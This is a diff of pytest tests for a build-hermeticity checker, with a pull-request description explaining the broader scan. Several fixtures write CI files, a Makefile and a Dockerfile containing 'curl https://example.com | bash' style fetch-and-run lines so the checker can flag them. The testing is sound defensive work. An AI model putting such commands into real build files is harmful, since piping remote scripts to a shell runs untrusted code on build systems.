+        (wf_dir / "ci.yml").write_text("steps:\n  - run: uv sync\n  - run: curl https://example.com | bash\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.FAIL
+
+    def test_fail_violation_in_makefile(self, tmp_path: Path) -> None:
+        (tmp_path / "Makefile").write_text("install:\n\tcurl https://example.com/tool.sh | bash\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.FAIL
+        assert any("Makefile" in v for v in result.evidence["violations_found"])
+
+    def test_fail_violation_in_composite_action(self, tmp_path: Path) -> None:
+        action_dir = tmp_path / ".github" / "actions" / "setup"
+        action_dir.mkdir(parents=True)
+        (action_dir / "action.yml").write_text(
+            "runs:\n  using: composite\n  steps:\n    - run: wget https://example.com/tool.tar.gz\n"
         )
         result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.FAIL
 
-    def test_editable_install_not_flagged(self, tmp_path: Path) -> None:
-        """`pip install -e .` is a local editable install, not a network fetch."""
+    def test_fail_violation_in_gitlab_ci(self, tmp_path: Path) -> None:
+        (tmp_path / ".gitlab-ci.yml").write_text("build:\n  script:\n    - pip install requests\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.FAIL
+
+    def test_fail_violation_in_circleci(self, tmp_path: Path) -> None:
+        circleci = tmp_path / ".circleci"
+        circleci.mkdir()
+        (circleci / "config.yml").write_text("jobs:\n  build:\n    steps:\n      - run: npm install\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.FAIL
+
+    def test_fail_dockerfile_curl(self, tmp_path: Path) -> None:
+        (tmp_path / "Dockerfile").write_text("FROM python:3.12\nRUN curl https://example.com/install.sh | bash\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.FAIL
+
+    # ------------------------------------------------------------------
+    # Dockerfile DEFERRED — apt-get is image build context, not a violation
+    # ------------------------------------------------------------------
+
+    def test_inconclusive_dockerfile_apt_get_only(self, tmp_path: Path) -> None:
+        (tmp_path / "Dockerfile").write_text("FROM python:3.12\nRUN apt-get install -y build-essential\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.INCONCLUSIVE
+        assert any("apt-get install" in d for d in result.evidence["deferred_found"])
+
+    # ------------------------------------------------------------------
+    # Comment stripping
+    # ------------------------------------------------------------------
+
+    def test_inconclusive_commented_out_violation(self, tmp_path: Path) -> None:
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
-        (wf_dir / "ci.yml").write_text("steps:\n  - run: pip install -e .")
+        (wf_dir / "ci.yml").write_text("steps:\n  # example (do not use): pip install requests\n  - run: uv sync\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.INCONCLUSIVE
+
+    def test_inconclusive_inline_comment_with_violation(self, tmp_path: Path) -> None:
+        wf_dir = tmp_path / ".github" / "workflows"
+        wf_dir.mkdir(parents=True)
+        (wf_dir / "ci.yml").write_text("steps:\n  - run: uv sync # previously: pip install -r requirements.txt\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.INCONCLUSIVE
+
+    # ------------------------------------------------------------------
+    # Strong signals → PASS
+    # ------------------------------------------------------------------
+
+    def test_pass_witness_in_workflow(self, tmp_path: Path) -> None:
+        wf_dir = tmp_path / ".github" / "workflows"
+        wf_dir.mkdir(parents=True)
+        (wf_dir / "ci.yml").write_text("steps:\n  - uses: testifysec/witness-run-action@v0.1\n")
         result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.PASS
+        assert "Witness" in result.message
+
+    def test_pass_nix_flake_build_in_ci(self, tmp_path: Path) -> None:
+        (tmp_path / "flake.nix").write_text("{ outputs = {}; }")
+        wf_dir = tmp_path / ".github" / "workflows"
+        wf_dir.mkdir(parents=True)
+        (wf_dir / "ci.yml").write_text("steps:\n  - run: nix build .#default\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.PASS
+        assert "Nix" in result.message
+
+    def test_pass_bazel_with_sandbox_flag(self, tmp_path: Path) -> None:
+        (tmp_path / "MODULE.bazel").write_text("module(name = 'myproject')")
+        wf_dir = tmp_path / ".github" / "workflows"
+        wf_dir.mkdir(parents=True)
+        (wf_dir / "ci.yml").write_text("steps:\n  - run: bazel build //... --sandbox_default_allow_network=false\n")
+        result = repro_hermetic_build_handler({}, make_ctx(tmp_path))
+        assert result.status == HandlerResultStatus.PASS
+        assert "Bazel" in result.message
 
 
 class TestProvenanceExists:
@@ -144,18 +498,14 @@ class TestProvenanceExists:
     def test_pass_with_cosign_in_workflow(self, tmp_path: Path) -> None:
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
-        (wf_dir / "release.yml").write_text(
-            "steps:\n  - uses: sigstore/cosign"
-        )
+        (wf_dir / "release.yml").write_text("steps:\n  - uses: sigstore/cosign")
         result = repro_provenance_exists_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.PASS
 
     def test_pass_with_slsa_generator(self, tmp_path: Path) -> None:
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
-        (wf_dir / "release.yml").write_text(
-            "steps:\n  - uses: slsa-framework/slsa-github-generator"
-        )
+        (wf_dir / "release.yml").write_text("steps:\n  - uses: slsa-framework/slsa-github-generator")
         result = repro_provenance_exists_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.PASS
 
@@ -170,9 +520,7 @@ class TestBitForBit:
     def test_pass_with_source_date_epoch(self, tmp_path: Path) -> None:
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
-        (wf_dir / "ci.yml").write_text(
-            "env:\n  SOURCE_DATE_EPOCH: 0"
-        )
+        (wf_dir / "ci.yml").write_text("env:\n  SOURCE_DATE_EPOCH: 0")
         result = repro_bit_for_bit_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.PASS
 
@@ -182,8 +530,6 @@ class TestBitForBit:
         INCONCLUSIVE (manual verification), never a false FAIL."""
         wf_dir = tmp_path / ".github" / "workflows"
         wf_dir.mkdir(parents=True)
-        (wf_dir / "ci.yml").write_text(
-            "steps:\n  - run: echo __DATE__"
-        )
+        (wf_dir / "ci.yml").write_text("steps:\n  - run: echo __DATE__")
         result = repro_bit_for_bit_handler({}, make_ctx(tmp_path))
         assert result.status == HandlerResultStatus.INCONCLUSIVE


### PR DESCRIPTION
## Summary

<!-- Brief description of changes -->

RE-02.01 (HermeticBuild) previously used a narrow v0.1 grep against only GitHub Actions workflows. This PR broadens the heuristic to v0.2:

- Broader scan surface: GitHub Actions workflows, composite actions (.github/actions/*/), GitLab CI, CircleCI, Jenkinsfile, Azure Pipelines, Drone, Buildkite, Makefiles, build scripts (scripts/build*, scripts/install*), Dockerfiles, and Containerfiles
- Comment stripping: Shell/YAML comments are stripped before pattern matching to eliminate false positives (e.g. curl in a comment)
- Dockerfile DEFERRED: apt-get install, apk add, etc. inside a Dockerfile are classified as DEFERRED — building the image environment is acceptable; fetching app deps at build time is not
- Strong hermeticity signals: Witness runtime attestation, Nix flake + CI, and Bazel network sandbox short-circuit to PASS when detected
- INCONCLUSIVE by default: A clean grep alone is no longer PASS — absence of violations is not proof of hermeticity (confidence 0.4)






## Type of Change

- [ ] Bug fix (non-breaking change fixing an issue)
- [x] New feature (non-breaking change adding functionality)
- [ ] Breaking change (fix or feature causing existing functionality to change)
- [ ] Documentation update
- [ ] Refactoring (no functional changes)

## Framework Changes Checklist

If this PR modifies the darnit framework (`packages/darnit/`):

- [ ] Updated framework spec (`docs/architecture/framework-design.md`) if behavior changed
- [ ] Ran `uv run python scripts/validate_sync.py --verbose` and it passes

## Control/TOML Changes Checklist

If this PR modifies controls or TOML configuration:

- [x] Control metadata defined in TOML (not Python code)
- [ ] SARIF fields (description, severity, help_url) included where appropriate
- [x] Ran validation to confirm TOML schema compliance

## Testing

- [x] Tests pass locally (`uv run pytest tests/ -v`)
- [x] Added tests for new functionality (if applicable)
- [x] Linting passes (`uv run ruff check .`)

## Additional Notes

<!-- Any additional context, screenshots, or information -->
